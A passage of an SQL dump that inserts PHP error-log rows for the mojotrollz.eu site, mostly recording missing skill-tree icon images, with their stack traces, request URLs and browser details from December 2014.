Firefox/33.0', 13, b'0', 0, 36, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (490, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_eyeforaneye.png\' found.', 'ec867b5d64db298dde8538124ca620cb703cbf4c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_eyef...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_eyef...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_eyeforaneye.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 34, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (491, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_auraoflight.png\' found.', '19914dcb95b647845095f4ccedaa6ac7945c94f2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_aura...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_aura...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.052, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_auraoflight.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 32, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (492, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_hammer_04.png\' found.', '0b1138cb8ea5d6b5a68648f03c38ddeac47da446', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_hammer_04.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_hammer_04.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_hammer_04.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 30, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (493, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_mindvision.png\' found.', '39cc9ea2888a2c75b1129d475c8ca09e75c573e7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_mind...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_mind...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_mindvision.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 28, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (494, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_racial_avatar.png\' found.', '5212ede3941270ce1c01a9981247ed278d4cdf45', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_racial_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_racial_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_racial_avatar.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 94, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (495, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_prayerofhealing.png\' found.', 'ad701df2fa723c80e57a9114b0a4d9338df6e9cc', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_pray...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_pray...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:33:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_prayerofhealing.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 76, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (496, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_aspectofthemonkey.png\' found.', 'c8c93949466bc701dfab2121aa63c8a7ef6b1dcd', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_hunter_aspectofthemonkey.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 126, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (497, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_beastsoothe.png\' found.', '81b26153d72be6326de1e52a8f44538537a046ea', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_hunter_beastsoothe.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 122, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (498, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_mount_jungletiger.png\' found.', '1bfaf1784ee73d16d3203108424a3cebe694602f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_mount_j...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_mount_j...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_mount_jungletiger.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 114, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (500, 'Exception', 'Autologout after 30 mins fail', '7c364cbd1e4b4dac5a08a08ac0ca0aa4a7b2b051', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Autologout afte...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 22:40:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Autologout%20after%2030%20mins%20fail', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (501, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_bullrush.png\' found.', '8d2544ee26733fbe17e28d06f180ab973cb49f7d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_bullrus...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_bullrus...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_bullrush.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 106, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (502, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_mendpet.png\' found.', '7f36d075a7d1269c65b308247db4498b52f91f40', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_hunter_mendpet.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 104, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (503, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_devour.png\' found.', '79fe9d0f5753bd3bacdc033bb8a869f56d20ec7d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_devour....\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_devour....\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_devour.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 98, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (504, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_misc_monsterclaw_03.png\' found.', 'd919bfe5e11da459f2e2000cd52002d9fa20b056', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_misc_monste...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_misc_monste...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_misc_monsterclaw_03.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 94, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (505, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_druid_ferociousbite.png\' found.', '753807cc1ba7df3359fba765ab29aa1f838d7fd2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_druid_f...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_druid_f...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_druid_ferociousbite.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 92, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (506, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_stun.png\' found.', 'b4ad3e63c17f62b62986c97600de6c47820a0277', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_stu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_stu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_stun.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 137, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (507, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_wizardmark.png\' found.', '40caeb7c0cb1fb08978d2ce62993cc87947ff788', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_wiz...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_wiz...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_frost_wizardmark.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 117, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (508, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_snipershot.png\' found.', '75280a0682bd4b3a959ce6168be1db62f0748f9b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.044, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_hunter_snipershot.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 87, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (509, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_searingarrow_png\' found.', 'dad1490bd8b5804af666f2f12a52b95513e56ba9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_searing...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_searing...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-13 22:52:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_searingarrow_png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (510, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_spear_07.png\' found.', 'c2f5eea8182d033cea8b4cb3ab461a53f0e38fb2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_spear_07.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_spear_07.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.056, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_spear_07.png', 'a:0:{}', 